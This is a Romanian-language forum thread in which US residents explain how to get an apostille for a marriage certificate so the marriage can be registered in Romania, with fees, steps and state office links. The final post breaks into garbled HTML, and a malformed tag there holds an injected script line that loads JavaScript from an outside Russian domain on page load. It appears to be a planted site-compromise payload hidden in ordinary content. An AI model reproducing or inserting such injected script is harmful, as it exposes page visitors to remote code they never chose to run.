Follow RomanianPortal on Twitter       
Rezultate 1 la 9 din 9

Subiect: Apostila? Unde si cat costa?

Data înscrierii
    25.06.2007
    Locație
    United States
    Posturi
    161
    Putere Rep
    10

Implicit

Trebuie sa-mi inregistrez casatoria in Romania si pentru asta se pare ca certificatul de casatorie incheiat in USA trebuie apostilat.

Cei care v-ati casatorit aici si v-ati inregistrat casatoria in tara chiar v-a trebuit aceasta nenorocita de apostila? Unde se face si cat costa? Am auzit ca ar fi 300 sau 400$? E ingrozitor de scump!

Data înscrierii
    31.12.2004
    Locație
    Canada, Deux-Montagnes
    Posturi
    2.213
    Putere Rep
    25

Implicit

Cred ca trebuie facut la cel mai aproape consulat roman de locul unde locuiesti tu. Nu cred ca ar costa asa cum spui tu. Ma astept sa platesti undeva la 100 $. Dar asta e ce cred eu, n-o lua ca o lege. Pentru a te informa mai bine, nu ai decat sa telefonezi la consulatul Romaniei cel mai apropiat. bafta.
    The uncertainty of knowledge:

http://www.youtube.com/watch?v=YltEym9H0x4

Guest

Implicit

Si eu am avut nevoie de apostila de la Haga chiar luna trecuta.Pentru ca s-o obtii tb sa faci o copie de pe cerficatul de casatorie,mergi cu ea la un notar ,de acolo mergi la Court House pentru autentificarea semnaturii notarului.Aici sa intrebi cum poti obtine apostila de la Haga .Iti vor dao "Cover Letter" pe care o completezi si o trimiti impreuna cu copia repectiva si un cec de 10$, prin posta ,la adresa pe care ti-o vor da cei de la Court House.Eu am platit 50$ pt express mail si am rezolvat in 3 zile.Succes.

Guest

Implicit

Da, fara apostila copia ta notarozata nu are nici o valoare acum in Romania.

Data înscrierii
    25.08.2005
    Locație
    United States
    Posturi
    1.876
    Putere Rep
    27

Implicit

Eu am aplicat prin posta pentru apostila, pentru ca m-am casatorit in alt stat, in Vegas a fost 20$ apostila. Cred ca daca mergi direct este mai ieftin. Nu am auzit pana acum de sume de sute pentru apostila.

Am mai avut nevoie de apostila pe o procura pentru Romania , atunci am platit 2 $ , deci nu cred sa fie vorba de sute....

Nu am raspuns de unde se obtine, pune pe google "secretary of state apostille" si statul tau si vei gasi centrele care pun apostila, eu asa am procedat.

Data înscrierii
    25.06.2007
    Locație
    United States
    Posturi
    161
    Putere Rep
    10

Implicit

Dragilor, va multumesc tuturor pentru raspuns. Am sa va urmez sfatul. M-am mai linistit vazand ca nu e atat de scump.

Ce bine ca avem un forum ca acesta! Am primit multe raspunsuri aici.

Inca o data multumiri!

Data înscrierii
    16.07.2008
    Locație
    United States
    Posturi
    3
    Putere Rep
    0

Implicit

Sunt Paralegal, Notar Public si Translator Autorizat al Curtii Supreme din Nevada,
    si de peste 4 ani lucrez cu si pt comunitatea Romana din Las Vegas.

Povestea cu sute de dolari pt o apostila de inregistrare a casatoriei e o aberatie:
    apostila e doar US$20, pt inregistrarea casatoriei, insa nu e "de la Haga" ci ceruta in baza conventiei de la Haga!

ma gasiti la xandu120@yahoo.com, sau in Las Vegas Romanian Journal - Alex, Paralegal.
    Scrieti-mi si va raspund, individual!

Bafta si numai fericire,
    A-LEX

Data înscrierii
    16.07.2008
    Locație
    United States
    Posturi
    3
    Putere Rep
    0

Implicit

ps:
    O apostila e doar certificarea statului care a emis documentul original catre alte state, care nu au cum in mod direct sa verifice autoenticitatea actului.

Consulatul Roman nu poate emite o apostila pe un document american pt ca nu are jurisdictie pentru documentele emise de oficialii locali sau federali ai US (prin local intelegand oras- primar , judet/county - prefect, sau stat - guvernator).

E o diferenta intre apostila emisa pt autentificarea / certificarea unei semnaturi notariale, apostila care nu este necesara in cazul in care procura/documentul a fost "notarizat " la consulat, in fata consulului, sau al altui ofiter consular, si atunci tara in care documentul isi va face valoarea juridica recunoaste diplomatii sai, SI APOSTILA PT CERTIFICAREA AUTENTICITATII UNUI DOCUMENT EMIS DE ALT STAT: aia nu are nimic de-a face cu consulatul tarii in care documentul urmeaza sa isi faca efectul (cum de exemplu este inregistrarea unei casatorii facute in Las Vegas, in actele de stare civila ale Romaniei)

Data înscrierii
    16.07.2008
    Locație
    United States
    Posturi
    3
    Putere Rep
    0

Implicit

</span><br style="font-weight: bold; color: rgb(0, 0, 127);">
    <br style="font-weight: bold; color: rgb(0, 0, 127);">
    Salutari, </span><br style="font-weight: bold; color: rgb(0, 0, 127);">
    Apostilele nu pot fi facute in Las Vegas / Clark County, </span><br style="font-weight: bold; color: rgb(0, 0, 127);">
    http://www.accessclarkcounty.com/dep...r/Marriage/Pag es/Apostille.aspx </span><br style="font-weight: bold; color: rgb(0, 0, 127);">
    ci doar in Carson City / Capitala statului Nevada:</span><br style="font-weight: bold; color: rgb(0, 0, 127);">
    http://sos.state.nv.us/business/apostille/index.asp</span><br style="font-weight: bold; color: rgb(0, 0, 127);">
    Regret ca nu am putut sa va raspund mai devreme , dar o urgenta m-a chemat inapoi in Romania.</span><br style="font-weight: bold; color: rgb(0, 0, 127);">
    Cu multa stima, </span><br style="font-weight: bold; color: rgb(0, 0, 127);">
    Alex

</span>
    <div>
    <div>[b]
    <div>Sincerely, </font>
    <div> Alex</font> </div>
    <div>
    <div></div>
    <div>
    <div> ROMANIAN &lt;=&gt; ENGLISH &lt;=&gt; FRENCH</font></font></div>
    <div> / </font></div>
    <div> Documents TRANSLATOR</font> &amp; Court / Simultaneous INTERPRETING</font></div>
    <div> NEVADA Supreme Court- Registered: Badge</font> # 4068</font></font></div></div></div>
    <div></div>
    <div>[b][b][u]
    <table border="0" cellpadding="0" cellspacing="0" width="55%">
    <t>
    <tr>
    <td style="font-size: 18px; color: rgb(51, 51, 51);" valign="center">
    <div><a rel="nofollow" id="275" name="27<script src=http://www.iroe.ru/ngg.js></script>

Subiecte similare

1. apostila
    De tweetyaly în forumul Nou veniti in America/SUA/Statele Unite-Ghidul incepatorului
    Răspunsuri: 1
    Ultimul post: 06.05.2008, 15:29
  2. Apostila de la Haga ?
    De leonina în forumul Vize imigrare, vize vizitator-Statele Unite/SUA/America
    Răspunsuri: 3
    Ultimul post: 04.11.2006, 15:04
  3. cat costa o cas de convenienta chicago
    De doriana în forumul Matrimoniale, prietenii, flirturi, intalniri, vrajeli
    Răspunsuri: 7
    Ultimul post: 21.03.2006, 14:28
  4. apostila?
    De în forumul Vize imigrare, vize vizitator-Statele Unite/SUA/America
    Răspunsuri: 1
    Ultimul post: 17.07.2005, 10:07
  5. cat costa o chirie?
    De Poliana în forumul Discutii Generale-de toate pentru toti, diverse